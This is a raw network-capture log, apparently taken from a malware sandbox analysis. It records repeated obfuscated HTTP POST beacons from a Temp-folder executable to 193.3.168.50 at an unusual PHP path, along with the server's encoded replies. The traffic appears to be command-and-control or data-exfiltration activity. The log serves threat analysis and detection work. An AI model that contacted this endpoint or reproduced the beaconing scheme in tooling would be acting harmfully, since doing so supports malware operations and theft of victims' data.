                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:45.643388033 CET1060OUTData Raw: 5f 5f 5a 59 59 5b 5f 52 5a 58 51 52 55 56 5a 59 50 55 5d 5a 59 53 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: __ZYY[_RZXQRUVZYPU]ZYSWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[-0)X++#>[/<=79#, #3< T!2Z38E"$)#G $],!
                                                                                                                  Dec 5, 2024 10:54:46.531136036 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.449926193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:46.743530989 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:47.098803997 CET1936OUTData Raw: 5a 5d 5f 53 59 58 5a 55 5a 58 51 52 55 50 5a 5d 50 53 5d 53 59 5d 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z]_SYXZUZXQRUPZ]PS]SY]WG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[/ .<)7 &_./1#:8,34',# "63,@5')#G $],
                                                                                                                  Dec 5, 2024 10:54:47.836030960 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:48.068979979 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 07 25 3b 2f 0c 24 5a 2b 1b 28 30 20 5b 2e 1d 23 5e 27 3e 07 43 25 29 3f 55 29 5c 33 12 22 03 2e 5b 2b 00 2f 1f 3f 19 02 18 28 28 20 58 00 1a 26 5d 34 0c 38 5b 3a 17 0e 5b 25 2e 35 06 30 03 29 14 3e 07 3f 52 3e 55 20 53 31 3e 3e 1b 29 33 07 16 2f 1a 07 5d 3a 2d 22 58 24 3f 2a 52 0e 17 21 50 2a 2d 34 13 20 31 2a 08 3d 22 20 05 2b 06 3b 53 30 3b 2d 0a 22 2e 29 52 33 56 39 53 30 32 22 54 24 16 2b 13 32 01 0e 5d 3d 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&%;/$Z+(0 [.#^'>C%)?U)\3".[+/?(( X&]48[:[%.50)>?R>U S1>>)3/]:-"X$?*R!P*-4 1*=" +;S0;-".)R3V9S02"T$+2]= _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.449928193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:47.428898096 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:47.784110069 CET1060OUTData Raw: 5f 59 5f 5a 59 59 5f 54 5a 58 51 52 55 54 5a 5c 50 55 5d 5e 59 5c 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Y_ZYY_TZXQRUTZ\PU]^Y\WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^8"+9 _.,17_(S-3;]3?8U 2Z'#"0;*=#G $],)
                                                                                                                  Dec 5, 2024 10:54:48.669554949 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:48.905261040 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.449934193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:49.155143023 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:49.523631096 CET1060OUTData Raw: 5f 5d 5a 5e 59 5a 5a 55 5a 58 51 52 55 5e 5a 58 50 52 5d 5d 59 53 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _]Z^YZZUZXQRU^ZXPR]]YSWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/3)?)([ );<9[7(U-+$<4)[3>#! ;)#G $],
                                                                                                                  Dec 5, 2024 10:54:50.396166086 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:50.629112005 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.449939193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:50.871925116 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:51.221606016 CET1060OUTData Raw: 5f 51 5f 59 5c 5e 5a 52 5a 58 51 52 55 50 5a 58 50 54 5d 5e 59 5b 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Q_Y\^ZRZXQRUPZXPT]^Y[WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.,3:(45=,%] _#-3$71*3<53#*#G $],
                                                                                                                  Dec 5, 2024 10:54:52.109564066 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:52.345233917 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.449942193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:52.741838932 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.449946193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:53.219307899 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:53.565650940 CET1936OUTData Raw: 5f 50 5a 59 5c 5d 5a 56 5a 58 51 52 55 53 5a 53 50 51 5d 5a 59 53 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _PZY\]ZVZXQRUSZSPQ]ZYSWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[,#5\? %>//:#:7, ('<,!2[%.0"3$(-#G $],5
                                                                                                                  Dec 5, 2024 10:54:54.440152884 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:54.673150063 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 5b 30 3b 38 11 24 3c 28 0b 3f 55 3c 5a 2c 33 27 5e 24 07 2d 45 26 03 23 52 29 03 3f 11 22 03 32 10 2b 39 05 1f 3f 51 2f 09 29 02 20 58 00 1a 25 07 20 31 2c 5d 2e 07 30 5c 25 3d 32 17 26 2d 08 04 29 39 01 18 2a 23 28 52 25 2e 2e 56 3d 0a 35 51 2d 24 36 07 2d 3e 3e 5d 32 15 2a 52 0e 17 22 0a 29 07 37 03 23 31 3d 1d 29 31 23 59 29 3c 30 0c 24 5e 3a 18 34 00 29 57 27 23 25 1d 27 0c 22 52 30 38 3c 07 31 3c 2f 03 29 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%[0;8$<(?U<Z,3'^$-E&#R)?"2+9?Q/) X% 1,].0\%=2&-)9*#(R%..V=5Q-$6->>]2*R")7#1=)1#Y)<0$^:4)W'#%'"R08<1</)9 _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.449947193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:53.367682934 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:53.721549988 CET1056OUTData Raw: 5a 59 5a 5c 59 59 5a 54 5a 58 51 52 55 57 5a 5d 50 51 5d 5b 59 5b 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ\YYZTZXQRUWZ]PQ][Y[WC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Z,0*<:+!%6Z8)]!)V-#$0V42Y'.0B5>#G $],=
                                                                                                                  Dec 5, 2024 10:54:54.605053902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:54.837070942 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.449951193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:55.090745926 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:55.576205969 CET1060OUTData Raw: 5a 5b 5a 5b 59 5b 5a 50 5a 58 51 52 55 51 5a 59 50 56 5d 59 59 59 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z[Z[Y[ZPZXQRUQZYPV]YYYWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^-09\?*(]469;%[ )'-4%<872X$X "#$T*=#G $],=
                                                                                                                  Dec 5, 2024 10:54:56.332887888 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:56.564897060 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.449955193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:56.808407068 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:57.159410954 CET1060OUTData Raw: 5f 5e 5a 5b 5c 5c 5f 54 5a 58 51 52 55 56 5a 5d 50 5e 5d 58 59 58 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _^Z[\\_TZXQRUVZ]P^]XYXWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[, 6<*;!6)//" 8,3$3Z,V#25Y3"V<U==#G $],!
                                                                                                                  Dec 5, 2024 10:54:58.047489882 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:58.281289101 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.449961193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:59.176068068 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:59.534157038 CET1060OUTData Raw: 5f 5c 5f 5b 5c 59 5f 55 5a 58 51 52 55 55 5a 53 50 5f 5d 59 59 53 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_[\Y_UZXQRUUZSP_]YYSWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y;6=*(Z "./=Y#)(S-?\0,4$>;!3(*#G $],-


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.449966193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:59.811508894 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:55:00.160885096 CET1936OUTData Raw: 5f 5f 5a 5e 5c 59 5a 5f 5a 58 51 52 55 5e 5a 5d 50 55 5d 53 59 59 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: __Z^\YZ_ZXQRU^Z]PU]SYYWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[- =)<[4&,<-Z4:(,3+[$ =Z'8D"#(==#G $],
                                                                                                                  Dec 5, 2024 10:55:01.052923918 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:55:01.285175085 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:55:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 10 25 2b 3c 1e 30 12 37 18 3c 20 38 5b 39 30 38 03 27 3d 29 0b 25 39 3f 11 3d 3a 27 11 21 5b 2a 5a 3c 29 33 53 3f 27 09 0f 29 02 20 58 00 1a 25 00 20 22 01 02 2c 39 34 13 26 03 04 17 26 3d 29 5a 3e 39 0d 18 29 30 28 53 25 07 29 09 2b 30 25 16 3b 0a 3d 59 3a 2e 2a 5c 24 2f 2a 52 0e 17 22 0e 28 2e 23 02 22 32 29 13 28 31 06 04 3c 06 3b 56 30 38 21 0a 37 3d 25 56 33 09 2a 0b 25 32 31 0a 27 06 05 10 31 3c 33 04 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%%+<07< 8[908'=)%9?=:'![*Z<)3S?') X% ",94&&=)Z>9)0(S%)+0%;=Y:.*\$/*R"(.#"2)(1<;V08!7=%V3*%21'1<3)) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.449967193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:59.939574003 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
